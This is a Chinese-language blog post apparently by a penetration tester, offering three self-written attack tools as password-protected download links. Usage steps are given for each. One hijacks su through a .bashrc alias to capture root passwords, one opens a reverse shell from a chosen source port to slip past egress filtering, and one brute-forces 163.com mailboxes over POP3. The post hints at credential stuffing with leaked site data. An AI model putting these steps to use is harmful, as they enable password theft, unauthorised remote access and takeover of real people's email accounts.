渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小实用。
一、记录root密码小工具
root.sh
下载地址:http://pan.baidu.com/s/1c0d6vO8 密码:agzc
渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本
二、设置源端口反弹shell
渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,Ping了下百度,可以ping通。那真相只有一个,服务器变态的限制了只能某些提供已某些端口为源端口去连接外面。
比如:只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。
谷歌程序无果,自己查了相关api后写了个。
client-port.c
下载地址:http://pan.baidu.com/s/1dD3SIXj 密码:n9gs
用法:gcc client-port.c -o port
chmod +x port
./port 你的IP 你的监听端口 本地的源端口
成功反弹shell 提权成功
三、邮箱爆破脚本
某个时候,需要爆破一批邮箱。
Burp163.pl
下载地址:http://pan.baidu.com/s/1mguQYSw 密码:cdkh
用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱
$email=”pop.163.com”;
再将去除掉@后面部分的邮箱地址比如lusiyu@163.com 去除后lusiyu存进去
同目录user.txt中吗,再将字典存进去pass.txt
你会说:这个有点鸡肋吧?万一邮箱的密码很复杂。
呵呵。
搞到了一个小站的数据,用这个程序批量测试密码是否就是邮箱密码。
呵呵,我啥都没说。
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/58037.html